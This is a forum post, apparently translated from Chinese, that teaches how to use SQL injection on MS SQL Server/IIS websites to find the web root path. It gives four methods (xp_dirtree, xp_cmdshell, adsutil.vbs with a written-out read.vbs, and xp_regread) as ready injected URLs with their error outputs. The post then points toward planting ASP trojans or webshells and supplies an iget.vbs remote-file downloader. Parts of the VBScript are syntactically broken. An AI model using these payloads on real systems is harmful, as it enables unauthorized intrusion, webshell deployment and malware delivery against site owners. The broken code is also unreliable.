SQL injection to obtain the complete website path
If the website only has 80 ports, you will find the following methods more useful
Almost all of the methods used in it are not what I discovered, and the article always includes some personal experience and skills when injecting
There are 4 methods (now known)
First method:
This is the <怪异的SQL注入>method introduced in < >
Using the xp_dirtree of sqlserver, let's first talk about the method, and then talk about its advantages and disadvantages (some additions are made on the basis of the original text)
Create tables
Statement:http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000))--
Back: Normal information! It means that the table is successfully created! Go on!
(The one built is a little bigger than the original, because I have encountered a file with a long name, and deleted the id because it is useless)
Statement:http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'c:\' --
Returns: Normal information. It means that all directories written to C drive are successful! Cool! The next step is to get the meter! Violate it and come out. (It seems that there is only one way to do this)
Statement:http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)-
Returns: Microsoft OLE DB Provider for SQL Server error 80040e07
Syntax error occurs when converting varchar value '@Inetpub' to a column with data type int.
Then the directory names in the table are burst out in turn!
Statement:http:// http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from
dirs where paths not in( '@Inetpub'))--
Returns: Microsoft OLE DB Provider for SQL Server error 80040e07
Syntax error occurred when converting varchar value 'test' to a column with data type int.
Then the directory names in the table are burst out in turn!
Okay, let's continue
Statement:http:// http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from
dirs where paths not in( '@Inetpub','test'))--
Returns: Microsoft OLE DB Provider for SQL Server error 80040e07
Syntax error occurs when converting varchar value 'haha' to a column with data type int.
Then the directory names in the table are burst out in turn!
Okay, you should know how to do it, haha, just add the name of the table you get to that parenthesis, put as many as you want,
A little trick:
Sometimes you will find that when the input is similar
http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)-
Instead of showing an error, the web page is displayed normally
Dizzy, don't be nervous
Look at 0<> (select top 1 paths from dirs) to show that the return is a number,
Haha, test it out and see how much it is
100>(select top 1 paths from dirs)
Back to normal
Haha, you can quickly guess with this method of greater than or less
Okay, let's continue
For example, when it appears
59=(select top 1 paths from dirs)
Return to normal,
ok, the name is 59
Enter as follows
http:// http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from
dirs where paths not in( '59'))--
Remember to put quotation marks
The following method is the same as the original
There is also a problem
Sometimes when entering 59 using the above method, I find that the next folder is still 59
What's going on?
Hehe, I don't know if you have noticed that 059 and 59 are the same?
That's why haha,
http:// http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from
dirs where paths not in( '059'))--
I found that the next folder name is displayed, ok
Analysis of advantages and disadvantages:
The advantage is that all sqlserver users can use it, because xp_dirtree applies the permission PUBLIC,
The disadvantage is that it displays the names of all folders in the directory, and the arrangement seems to be in no order, in short, it is painful to find the folder you want in thousands or tens of thousands of folders.
And you know that having that folder is not guaranteed to be in the root directory, which is really a painful thing, many times it depends on luck and endurance.
I wish you success
Method 2:
Utilize xp_cmdshell
Haha, everyone must be familiar with this, let me say it briefly
Create tables
Statement:http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000))--
Back: Normal information! It means that the table is successfully created! Go on!
(The one built is a little bigger than the original, because I have encountered a file with a long name, and deleted that id because it is useless.)
Statement:http://www.xxxxx.com/down/list.asp?id=1;insertdirs exec master.dbo.xp_cmdshell 'dir c:\ /B/D' --
Returns: Normal information. It means that all directories written to C drive are successful! dir c:\ /B/D is used here, haha, if you don't know what /B/D does, try to see what it does
Statement:http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)-
Returns: Microsoft OLE DB Provider for SQL Server error 80040e07
Syntax error occurs when converting varchar value '@Inetpub' to a column with data type int.
Then the directory names in the table are burst out in turn!
Statement:http:// http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from
dirs where paths not in( '@Inetpub'))--
Returns: Microsoft OLE DB Provider for SQL Server error 80040e07
Syntax error occurred when converting varchar value 'test' to a column with data type int.
Then the directory names in the table are burst out in turn!
The method is the same as above, so I won't talk about it
Sometimes we can also do something with the following two extensions
1) We can take advantage of xp_availablemedia to get all the current drives and save them in the dirs table:
5 ; insert dirs exec master.dbo.xp_availablemedia; --
We can get the list of drives and related information by querying the contents of temp
(2) We can use xp_subdirs to get the list of subdirectories and store them in the dirs table:
5 ; insert into dirs exec master.dbo.xp_subdirs 'c:\' ; --
Analysis of advantages and disadvantages:
Obviously, this will not xp_dirtree the situation where all the directories are put together, only the first-level directory will be displayed, which is much easier to find.
The disadvantages are also obvious, only SA has this permission, and it is also possible that the administrator deleted this extension (after all, it is too powerful).
Method 3:
This approach is good
The following is the original text
Thought of using the adsutil.vbs program, which I executed
a'; exec master.. xp_cmdshell 'cmd /c cscript c:\inetpub\adminscrips\adsutil.vbs enum w3svc/1/root>a.txt'; --
Isn't it long? Through it, we can set up the first virtual website in IIS (including the actual directory where it is located, of course)
Import into a.txt
The default for the actual location of the a.txt is of course c:\winnt\system32, which is actually not a problem, but when encountering an administrator who sets adsutil.vbs
Delete or put it elsewhere
We can't do anything about it (you can't write one with the echo command yourself)
Step 2: Use the echo command to write the following code into c:\, which is not a lot
..... xp_cmdshell 'echo set fso1=createobject("scripting.filesystemobject">c:\read.vbs'; --
..... xp_cmdshell 'echo Set WshShell = Wscript.createObject("Wscript.Shell">>c:\read.vbs'
; --
.....
-------------------read.vbs---------------------------------
set fso1=createobject("scripting.filesystemobject"
Set WshShell = Wscript.createObject("Wscript.Shell"
spa=WshShell.Environment("process"("windir"
set fil =fso1.opentextfile(spa & "\system32\aa.txt"
do while not fil.atendofstream
nr=fil.readline
if left(nr,4)="Path" then
pa=mid(nr,instr(nr,"" 3,len(nr)-instr(nr,""-3)
exit do
end if
loop
set fil1 =fso1.opentextfile(pa &"\dd.asp",2,true)
fil1.writeline ""
---------------cut here-------------------------------------
Step 3: Of course, it is to execute read.vbs, so that we can read the content in the aa.txt and find the actual path of the website
Then write a file called dd.asp in the root directory of the web site, and you will know if you can try it successfully
executehttp://x.x.x.x/dd.asp
Returns: \xxx
Haha, it's a good way,
However, the original text seems to have some problems
It is
set fil =fso1.opentextfile(spa %2B "\system32\aa.txt"
set fil1 =fso1.opentextfile(pa%2B"\dd.asp",2,true)
Error occurs when two sentences are submitted
So we came up with the plus sign, which has the same function as &
And what to write about dd.asp? Write to pa, haha
Haha, I changed it
-------------------read.vbs---------------------------------
set fso1=createobject("scripting.filesystemobject"
Set WshShell = Wscript.createObject("Wscript.Shell"
spa=WshShell.Environment("process"("windir"
set fil =fso1.opentextfile(spa "\system32\aa.txt"
do while not fil.atendofstream
nr=fil.readline
if left(nr,4)="Path" then
pa=mid(nr,instr(nr,"" 3,len(nr)-instr(nr,""-3)
exit do
end if
loop
set fil1 =fso1.opentextfile(pa "\dd.asp",2,true)
fil1.writeline pa
---------------cut here--------------------------------------
Because the time number is converted to a space when submitting in a browser, you should also set the
It becomes %2B, okay, it should be fine, as follows
-------------------read.vbs---------------------------------
set fso1=createobject("scripting.filesystemobject"
Set WshShell = Wscript.createObject("Wscript.Shell"
spa=WshShell.Environment("process"("windir"
set fil =fso1.opentextfile(spa %2B "\system32\aa.txt"
do while not fil.atendofstream
nr=fil.readline
if left(nr,4)="Path" then
pa=mid(nr,instr(nr,"" 3,len(nr)-instr(nr,""-3)
exit do
end if
loop
set fil1 =fso1.opentextfile(pa %2B "\dd.asp",2,true)
fil1.writeline pa
---------------cut here--------------------------------------
If we find that 1 is not there, we can become 2, 3, 4...........
a'; exec master.. xp_cmdshell 'cmd /c cscript c:\inetpub\adminscrips\adsutil.vbs enum w3svc/2/root>a.txt'; --
But this method can only be used under Windows 2000, because the addresses of newly created websites under 2003 are not arranged according to 1234, it seems to be randomly generated, and I have compared several under 2003
address, no regularity was found.
Analysis of advantages and disadvantages:
Ditto xp_cmdshell Not every user can use it! Another problem is that the adsutil file does not necessarily exist, or is not necessarily in that path, although you can use it if you intended
echo writes one (haha, old and old), and another question is, what if there are many sites on the host? I have met a host with nine sites, and only the eighth is useful
Yes, faint, it's hard for anyone to have the patience to persist so much, maybe it has collapsed a long time ago. Also, it can't be used in 2003!
But to be honest, this method is indeed a good method
Method 4:
This method is to read the path from the registry through xp_regread etc
The following is recommended to obtain the web page path (read the registry through stored procedures):
Utilize the built-in stored procedure xp_regread (read registry key, permission public):
Statement: http://www.xxx.com/list.asp?classid=1; create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare@test
varchar(20) exec master.. xp_regread @rootkey= HKEY_LOCAL_MACHINE , @key=
SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\ , @value_name= / , values=@test OUTPUT insert into paths
(path) values(@test)
IIS default path in the registry HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\
Use the burst field to read out the value of the database:
Statement: http://www.xxx.com/list.asp?classid=1 and 0<>(select top 1 paths from newtable)--return: Microsoft OLE DB Provider for
ODBC Drivers error 80040e07 [Microsoft][ODBC SQL Server Driver][SQL Server] converts varchar value E:\www,,201 to a data type of int
column.
This means that the web page directory is in E:\www, and then you can also use FSO to write directly to the ASP Trojan
What if you can't get a web directory? You have to guess whether the website uses the default WEB or the domain name as the WEB.
declare @o int exec sp_oacreate wscript.shell , @o out exec sp_oamethod @o, run , NULL,' cscript.exe c:
\inetpub\wwwroot\mkwebdir.vbs -w "default website" -v "e","e:\"'
Create a virtual directory E under the default WEB site, pointing to E: under disk.
declare @o int exec sp_oacreate wscript.shell , @o out exec sp_oamethod @o, run , NULL,' cscript.exe c:
\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e browse'
It's good to add browsing attributes to the virtual directory e. Open a virtual service for yourself. Thinking about those web page directory paths, my head is almost broken. Now I opened my eyes. That is the WEBSHELL that uses MS
SQL is the end of our work, and the next job should be yours.
Haha, the method is good, read it through the registration form, convenient and fast!
Analysis of advantages and disadvantages:
The advantage is, of course, that it is convenient and fast. The downside is that you can only see the path of the default IIS site, and if it is no longer the default site then there is nothing you can do (I tracked it with regsnape), if under 2003
That is, even the default site path is not displayed! In pain
By the way, in fact, there are other ways to continue the intrusion besides finding the website path, such as uploading the bounce Trojan through tftp, or writing an iget.vbs to download the dongdong you want
The iget.vbs code is as follows:
---------start----------
Set xPost = createObject("Microsoft.XMLHTTP"
xPost.Open "GET",LCase(WScript.Arguments(0)),0
xPost.Send()
Set sGet = createObject("ADODB. Stream"
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile LCase(WScript.Arguments(1)),2
----------end-----------
Supplement to this article:
Recently, I found that my understanding of Chairman Mao's instructions was not deep enough, and I would like to add here
In fact, the above methods do not need to be compared at all xp_dirtree they are the best, as long as this one method is enough
It's just because I was too ..............
Today, I will dig up the secret of xp_dirtree again
Okay, let's exec master: xp_dirtree'd:/test'
Let's say we have two folders in test, test1 and test2, and test3 in test1
The results show
subdirectory depth
test1 1
test3 2
test2 1
Haha I found that there is no depth that is the series of the directory
Okay, know what to do
http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000),id int)--
http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'd:\' --
http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where id=1)-
As long as id=1 is added, it is the first-level directory.
|
Posted on 2/7/2015 10:19:16 PM
|
|
|
